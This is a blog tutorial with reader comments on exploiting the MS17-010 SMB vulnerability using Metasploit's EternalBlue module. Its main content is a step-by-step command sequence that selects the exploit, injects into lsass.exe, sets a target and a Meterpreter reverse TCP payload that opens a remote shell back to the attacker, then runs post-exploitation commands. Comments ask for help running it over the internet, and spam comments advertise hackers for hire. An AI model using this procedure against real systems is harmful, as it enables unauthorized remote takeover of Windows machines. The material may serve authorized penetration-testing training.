MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload.
set lhost <IP_Address>
This command sets the listening IP address.
This command starts the exploit process.
This Meterpreter command displays information about the target system (after performing successful exploitation and after a Meterpreter session was established)
This Meterpreter command displays the Meterpreter user on the target.
This Meterpreter command closes the current Meterpreter session.


  1. RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30). What's seems to be the problem when we facing this? Scan whole subnet every one of them getting timeout . Even when using scanner, the metasploit bold the ip with information that the ip has been breached by double pulsar

    1. Seems strange ... might be worthwhile to fully update your Kali Linux installation. That will update your Metasploit installation also.

    2. Yeah, I get the RubySMB...... error too, tried several settings but the exploit cant seem to run past that point!!

  2. Need Help. How to i achieve this over the Wan? I've forwarded the port and whenever i exploit it shows Handler failed to bind to my External IP.

    Your help in setting this up would really be appreciated

  3. RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
    [*] Exploit completed, but no session was created.

    Please help me on this error..Thanks

  4. I read all the information you have mentioned in your blog that is really commendable about Hire A Professional Hacker. I really like your post, please share more information with us.

  5. Absolutely knowledgeable content. Thanks for sharing this kind of content. It is very helpful and very informative and I really learned a lot from it. Vulnerability assessment services

  6. Wow, What an Excellent post. I really found this to much informative. It is what I was searching for. I would like to suggest you that please keep sharing such type of info.Hire A Verified Hacker

  7. It's really a great and helpful bit of data that you have shared here. I'm glad that you just imparted this accommodating data to us. Kindly share these types of knowledge with us. Much thanks to you for sharing it Hire A Cell Phone Hacker

  8. I really like reading through a post that can make people think. Also, many thanks for permitting me to comment!

    Vulnerability Scanner


Post a Comment

Popular Posts

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux